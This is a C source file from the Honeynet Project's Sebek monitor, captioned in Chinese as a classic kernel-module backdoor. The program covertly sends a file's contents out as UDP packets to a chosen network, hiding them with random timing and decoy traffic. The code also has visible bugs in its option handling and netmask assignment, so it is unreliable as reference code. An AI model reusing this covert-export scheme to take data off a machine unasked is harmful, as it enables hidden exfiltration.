sdm.c

一款经典的lkm后门

//--------------------------------------------------------------------
//----- $Header: /home/cvsroot/sebek/mon/sdm.c,v 1.3 2002/09/08 22:48:57 cvs Exp $
//--------------------------------------------------------------------
/*
 * Copyright (C) 2001/2002 The Honeynet Project.
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 *    must display the following acknowledgement:
 *      This product includes software developed by The Honeynet Project.
 * 4. The name "The Honeynet Project" may not be used to endorse or promote
 *    products derived from this software without specific prior written
 *    permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY
 * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 */


#include <sdm_utils.h>

void Usage(){
  
  printf(" -s source        IP network specification: a.b.c.d/xy\n");
  printf(" -d destination   IP network specification: a.b.c.d/xy\n");
  printf(" -k encryption key\n");
  printf(" -d destination port number\n");
  printf(" -m magic number\n");
  printf(" -f filename\n");
  printf(" -x maximum interpacket delay\n");

  printf("Examples:\n");
  printf("  To make everything pretty random including port data:\n");
  printf("  fmon -d 10.0.0.0/8 -s 10.0.0.0/8 -m 7777 -k foobar\n\n");
  
  printf("  To have static destination addr and port:\n");
  printf("  fmon -d 10.0.0.1/32 -s 10.0.0.0/8 -d 123 -k foobar\n\n");

  printf("  To have static src and dst with static ports:\n");
  printf("  fmon -d 10.0.0.1/32 -s 10.0.0.2/32 -d 123 -m 223\n");
  printf("  - the src port = value of -m minus value of -d\n");

}

int GenNetInfo(char* netstr,int is_src){
    struct in_addr net;       /* place to stick the local network data */
    
    int nmask;                /* temporary netmask storage */

    char * str1;
    char * str2;

    u_int32_t *ip;
    u_int32_t *mask;

    if(is_src){
      ip   = &pv.src_ip;
      mask = &pv.src_mask;
    }else{
      ip   = &pv.dst_ip;
      mask = &pv.dst_mask;
    }

    /* break out the CIDR notation from the IP address */
    str1 = strtok(netstr,"/");
    str2 = strtok(NULL,"/");

    if(str2 && strlen(str2) < 3 && strlen(str2) > 0){
        /* convert the CIDR notation into a real live netmask */
        nmask = atoi(str2);

        if((nmask > 0) && (nmask < 33)){
            *mask = netmasks[nmask];
        }else{
            FatalError("ERROR: Bad CIDR block [%s:%d]\n", str2, pv.src_mask);
        }
    }else{
      /*  if we have no mask then assume its a /32 mask */
     mask = netmasks[32];
      
    }

    /* convert the IP addr into its 32-bit value */
    if((net.s_addr = inet_addr(str1)) == -1){
        FatalError("ERROR: %s is not valid IP addr\n",str1);
    }else{
        /* set up the source IP */
        *ip = ((u_int32_t)ntohl(net.s_addr));
    }

    return 1;
}

int CheckConfig(){
  if(!pv.dst_ip){
    Usage();
    FatalError("Need to specify Destination IP\n");
  }

  if(!pv.src_ip){
    Usage();
    FatalError("Need to specify Source IP\n");
  }

  if(!pv.dst_port && !pv.magic){
    Usage();
    FatalError("Need to specify the Destination Port number and/or Magic Number\n");
  }
  
  if(!strlen(pv.filename))
    strncpy(pv.filename,filename,IBUF);

  if(!pv.ipd){
    pv.ipd = 1000000;
  }

  
  return 1;

}


int ParseCmdLine(int argc, char *argv[])
{
  int ch;
  char *valid_options;
  u_char digest[16];

  valid_options = "vf:k:s:d:p:m:x:";

  while((ch = getopt(argc, argv, valid_options)) != -1)
    {
      switch(ch)
        {
	case 'v':
	  pv.verbose = 1;
	  break;

	case 'f':
	  strncpy(pv.filename,optarg,IBUF);
	  break;
  
	case 'k':
	  if(strlen(optarg)>4 && strlen(optarg) < 80){
	    MD5(optarg,strlen(optarg),digest);
	    BF_set_key(&pv.key,sizeof(digest),digest);
	  }else{
	    FatalError("Password unacceptable, either too short or too long",1);
	  }
	  break;
 
	case 'p':
	  pv.dst_port = atoi(optarg);
	  break;

	case 'm':
	  pv.magic = atoi(optarg);
	  if(pv.dst_port > 0){
	    pv.src_port = pv.magic - pv.dst_port;
	  }
	  break;

	case 's':
	  GenNetInfo(optarg,1);
	  break;

	case 'd':
	  GenNetInfo(optarg,0);
	  break;
	  
	case 'x':
	  pv.magic = atoi(optarg);
	  if(pv.ipd > MAX_INTERPKTDELAY)pv.ipd = MAX_INTERPKTDELAY;

	}
    }
  return CheckConfig();
}


int main(int argc, char **argv){

  FILE *f;
  char ar[IBUF];
  char decoy_buff[IBUF];
  int  ret, arlen,idlen;

  struct sockaddr_in libnet_sock;
  struct libnet_link_int *write2net;
  u_char *libnet_dev = NULL;
  char libnet_err[LIBNET_ERRBUF_SIZE];

  u_int32_t id;

  int decoy = 0;
  int x = 0;

  int rd_sz;

 
  rd_sz = IBUF - sizeof(id);

  libnet_seed_prand();

  ParseCmdLine(argc,argv);

  //---- get the host ID, aka first IP addr ----
  id = get_id();


  //----- libnet initialization stuff
  if (libnet_select_device(&libnet_sock,&libnet_dev, libnet_err) == -1) {
    libnet_error(LIBNET_ERR_FATAL, "libnet_select_device failed: %s\n", libnet_err);
    exit(-1);
  }
  if ((write2net = libnet_open_link_interface(libnet_dev, libnet_err)) == NULL) {
    libnet_error(LIBNET_ERR_FATAL, "libnet_open_link_interface: %s\n", libnet_err);
    exit(-1);
  }


  //----- some initialization
  memset(ar,0,sizeof(ar));  
  memset(decoy_buff,0,sizeof(decoy_buff));
  arlen = 0;
  idlen = 0;
  

  if(getuid() != 0)exit;


  //----- first 32 bits of payload is the host ID
  //----- set it once and forget.
  memcpy(ar,&id,sizeof(id));
  idlen = sizeof(id);

  if(pv.verbose)printf("Reading data from: %s\n",pv.filename);
  
  while(1){  
    //---- if the file exists read all the data from it
    if((f = fopen(pv.filename,"r")) != NULL){
      while(1){
	//----- read data in blocks of rd_sz  len
	ret = fread(ar + idlen,1,rd_sz,f);
        if(!ret){
	  fclose(f);
	  break;
        }
	arlen = ret + idlen;

        //----- export onto the network
	create_udp(ar,arlen,write2net,libnet_dev,1);
	usleep(libnet_get_prand(PRu32) % pv.ipd); 
	
	if(pv.verbose)printf("wrote %d bytes\n",arlen +4);
	
        //----- zero out the array and set arlen to 0
        memset(ar+idlen,0,sizeof(ar)-idlen);
                           
        //----- partial buffer indicates the end of file
	if(ret != rd_sz){
	  fclose(f);
          break;
	}
      }
      

    }else{
      //------ no data, spew a few decoys
      for(x =0;x <= MAX_DECOY;x++){
	//----- host ID for decoys is set to 0
	create_udp(decoy_buff,sizeof(decoy_buff),write2net,libnet_dev,0);
	usleep(libnet_get_prand(PRu32) % pv.ipd); 
      }
    }
  }//While
}//Main